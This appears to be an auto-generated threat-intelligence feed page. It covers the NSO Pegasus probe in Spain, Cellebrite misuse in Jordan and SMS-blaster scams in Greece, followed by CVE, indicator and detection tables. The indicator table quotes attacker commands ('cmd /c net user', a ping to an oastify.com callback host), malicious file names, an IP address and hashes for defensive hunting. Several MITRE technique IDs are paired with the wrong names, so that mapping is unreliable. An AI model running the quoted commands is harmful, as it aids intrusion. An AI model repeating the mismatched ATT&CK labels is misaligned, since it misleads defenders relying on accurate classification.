Summarizing the past year’s threat landscape based on activity observed in ANY.RUN’s Interactive Sandbox, this annual report provides insights into the most detected malware types, families, TTPs, and phishing threats of 2025. For additional insights, view ANY.RUN’s quarterly malware trends reports. Key Takeaways Summary In 2025, ANY.RUN experienced significant growth alongside a rise in malicious activity. The numbers reflect a substantial growth of deep investigations and the detections of evasive threats facilitated by Interactive Sandbox: As investigation volume and behavioral visibility increase, 15K+ security teams gain earlier detection, richer […] The post Malware Trends Report 2025: New Security Risks for Businesses in 2026 appeared first on ANY.RUN's Cybersecurity Blog .

Attack Profile

Surface:

Phases:

MITRE:

Actors and Tooling

Threat Actors:

Malware/Tools:

Campaign:

Business Impact

Why it matters:

Owner team:

Mitigation

Immediate Actions

/cybersecurity-blog/malware-trends-2025/

Spanish judge closes NSO Group spyware probe due to lack of cooperation from Israel

Cyber-espionage Severity: High Likelihood: High Prevalence: High

PublishedJanuary 22nd, 2026

Updated

The case dates to May 2022, when the court launched a probe into the alleged spying on devices belonging to Prime Minister Pedro Sánchez and Defence Minister Margarita Robles.

Attack Profile

Surface: Mobile Devices (Phones)

Phases: Weaponization, Delivery, Exploitation, Action on Objectives

MITRE: Initial Access, Execution, Collection T1056.001 - Native API (Pegasus)

Actors and Tooling

Threat Actors: NSO Group, Israeli Government

Malware/Tools: Pegasus

Campaign:

Business Impact

Why it matters: Highlights the potential for state-sponsored cyber-espionage and the challenges of international cooperation in investigations involving spyware technologies. Demonstrates the impact on government officials and civil society.

Owner team:

Mitigation

Enhanced mobile device security measures, investigation into the source of the attacks, diplomatic efforts to address the issues of spyware proliferation.

Immediate Actions

Review mobile device security posture. Monitor for similar activity.

NSO GroupPegasuscyber-espionagespywareSpain

https://therecord.media/spanish-judge-closes-nso-group-spyware-probe-israel

Jordan used Cellebrite phone-hacking tools against activists critical of Gaza war, report finds

Government Misuse of Technology Severity: Likelihood: Prevalence: Known to be used in multiple countries including Russia, Nigeria, Botswana, Myanmar, Italy and Belarus.

PublishedJanuary 22nd, 2026

Updated

The findings, published by Citizen Lab Thursday, are based on the research institute’s digital forensic analysis of seized phones in four cases and Jordanian court records in three cases.

Attack Profile

Surface: Mobile Devices (iOS & Android)

Phases: Data Extraction, Forensics

MITRE: Collection T1005 - Data from Local System

Actors and Tooling

Threat Actors: Government of Jordan

Malware/Tools: Cellebrite

Campaign:

Business Impact

Why it matters: Demonstrates abuse of digital forensics tools against civil society and human rights defenders.

Owner team:

Mitigation

Cellebrite should implement watermarking and increase customer vetting.

Immediate Actions

Review and enhance data security practices.

CellebriteJordanactivism

https://therecord.media/jordan-used-cellebrite-against-activists-critical-gaza-war

Greek police arrest scammers using fake cell tower hidden in car trunk

Cybercrime Severity: High Likelihood: High Prevalence: Increasing, previously reported in Thailand, Indonesia, Qatar, and the United Kingdom

PublishedJanuary 21st, 2026

Updated

A vehicle search uncovered a mobile computing system hidden in the trunk and connected to a roof-mounted transmitter disguised as a shark-fin antenna.

Attack Profile

Surface: Mobile networks, SMS

Phases: Initial Access, Execution, Persistence, Collection, Exfiltration

MITRE: Initial Access, Collection, Command and Control T1189 - Drive-by Compromise, T1005 - Input Capture, T1071.001 - System Information Discovery

Actors and Tooling

Threat Actors: Chinese nationals (reportedly)

Malware/Tools: SMS blaster, DC-to-AC power converter (NFA)

Campaign: N/A

Business Impact

Why it matters: This operation demonstrates a sophisticated and rapidly deployable scamming technique that exploits vulnerabilities in mobile networks to steal sensitive information and commit fraud.

Owner team: N/A

Mitigation

Strengthen mobile network security, implement 2FA for sensitive transactions, educate users about phishing scams, monitor for rogue base stations.

Immediate Actions

Monitor mobile network traffic, investigate suspicious SMS activity, share threat intelligence with telecom providers.

SMSScamsphishingGreece

https://therecord.media/greek-police-arrest-scammers-using-hidden-cell-towers

Vulnerabilities

Exploitable CVEs and patch guidance.

Signal ID	CVE	Vendor/Product	CVSS	Exploited	Patch	Notes	Fix/Workaround	References
SIG-001	CVE-2025-51683	Mjobtime	Not specified	Yes	Yes (Version 15.7.3 or later)	Blind SQL injection vulnerability	Patch application, restrict MSSQL access, disable xp_cmdshell	https://www.huntress.com/blog/hacked-construction-apps-bringing-down-jobsite-security
SIG-016	CVE-2026-20045	Cisco Unified Communications Manager, Cisco Unified Communications Manager Session Management Edition, Cisco Unified Communications Manager IM & Presence Service, Cisco Unity Connection, Cisco Webex Calling Dedicated Instance	8.2	Yes	Yes	Improper validation of user-supplied input in HTTP requests.	Apply Cisco security patch	https://nvd.nist.gov/vuln/detail/CVE-2026-20045

Indicators of Compromise

Hunt-ready indicators with context, confidence, and expiry guidance.

Signal ID	Type	Value	Context	Kill Chain	Confidence	First Seen	Last Seen	Action	FP Risk	References
SIG-001	URI	/Default.aspx/update_profile_Server	Web server logs	Initial Access	High	Feb 21, 2025	Dec 20, 2025	Monitor	Low	https://www.huntress.com/blog/hacked-construction-apps-bringing-down-jobsite-security
SIG-001	Command Line	cmd /c net user	Executed commands	Lateral Movement	High	Feb 21, 2025	Dec 20, 2025	Block	Medium	https://www.huntress.com/blog/hacked-construction-apps-bringing-down-jobsite-security
SIG-001	Command Line	ping ei0lwafp0h7178z7qer9r9oualgc45su.oastify.com	Executed commands	Lateral Movement	High	Feb 21, 2025	Dec 20, 2025	Block	Medium	https://www.huntress.com/blog/hacked-construction-apps-bringing-down-jobsite-security
SIG-006	File Name	Премия 2025.zip	ZIP archive containing malicious LNK	Initial Access	High
SIG-006	File Name	Документ_1_О_размере_годовой_премии.pdf.lnk	Malicious LNK file	Initial Access	High
SIG-006	IP Address	46.149.71.230	Remote server hosting malicious files	Execution	High
SIG-006	File Name	s.exe	DUPERUNNER implant	Execution	High
SIG-006	File Name	fontawesome_tld.woff	File downloaded by DUPERUNNER	Execution	Medium
SIG-006	File Name	fontawesome.woff	AdaptixC2 beacon disguised as a font file	Command and Control	Medium
SIG-007	File Name	AfghanistanIslamiEmirates.iso	Initial Sample	Initial Access	High	Dec 23, 2025	Dec 24, 2025	Block/Monitor	Low	https://www.seqrite.com/blog/operation-nomad-leopard-targeted-spear-phishing-campaign-against-government-entities-in-afghanistan/
SIG-007	File Name	Doc.pdf.lnk	Malicious LNK File	Execution, Persistence	High			Block/Monitor	Low	https://www.seqrite.com/blog/operation-nomad-leopard-targeted-spear-phishing-campaign-against-government-entities-in-afghanistan/
SIG-007	File Name	img.jpg	FALSECUB Payload	Execution	High			Block/Monitor	Low	https://www.seqrite.com/blog/operation-nomad-leopard-targeted-spear-phishing-campaign-against-government-entities-in-afghanistan/
SIG-011	MD5	02ec920f0e4d4e2df98bb523f5a90d4c
SIG-011	MD5	12c541f80f6a563f3ce4b9a665cb610f
SIG-011	MD5	6a02be4a99d0595e6ec6c1d9587cc8d8
SIG-011	MD5	6e30ce3e09f20e3a60c8aabb2a0fdc1c
SIG-011	MD5	7a54f209d041272a73ed4316b3b106cb
SIG-026	File Name	Cellebrite	Software name
SIG-027	Domain	N/A	Phishing links in scam messages	Exfiltration	Low	N/A	N/A	Block	Low	https://therecord.media/greek-police-arrest-scammers-using-hidden-cell-towers

Detection Ideas

Queries and hunting logic for quick detection engineering.

Suspicious Job Application Activity

Log Sources

Email Logs, Application Logs, Network Traffic Logs

Data Prereqs

Access to application logs and email archives

Logic Summary

Monitor for suspicious job applications from unusual locations or with generic/automated content. Analyze email traffic for signs of social engineering.

Use Cases

Identify potential attackers using fake job applications.

FP Profile

False positives from legitimate applicants using automated tools or from regions with limited internet access.

Triage Notes

Prioritize investigations based on the reputation of the applicant and the sensitivity of the target systems.

Cellebrite Data Extraction

Log Sources

Mobile device logs, network traffic logs

Data Prereqs

Access to Cellebrite software, forensic data

Logic Summary

Hypothesis: Identify instances of data extraction from mobile devices using Cellebrite software based on logs and network traffic patterns. This could indicate unauthorized data access.

Use Cases

Detect if Cellebrite software is installed and running on employee devices.
Monitor network traffic for communication with Cellebrite servers.
Investigate potential data breaches involving mobile devices.

FP Profile

False positives may occur if Cellebrite is legitimately used for forensic analysis by authorized personnel.

Triage Notes

Verify legitimate use cases before escalating.

SMS Blaster Activity

Log Sources

Mobile network logs, SMS traffic data

Data Prereqs

Ability to monitor mobile network traffic and identify unusual SMS activity.

Logic Summary

Detect unusual SMS traffic patterns originating from a single device or location, including mass SMS sending and downgrading of network connections to 2G.

Use Cases

Identify rogue base stations and SMS blaster campaigns targeting mobile users.
Investigate reports of phishing SMS messages and trace their origin.
Monitor for indicators of compromise related to known SMS blaster equipment.

FP Profile

Legitimate SMS marketing campaigns or network maintenance activities.

Triage Notes

Investigate any alerts related to unusually high SMS traffic volume or downgrade to 2G.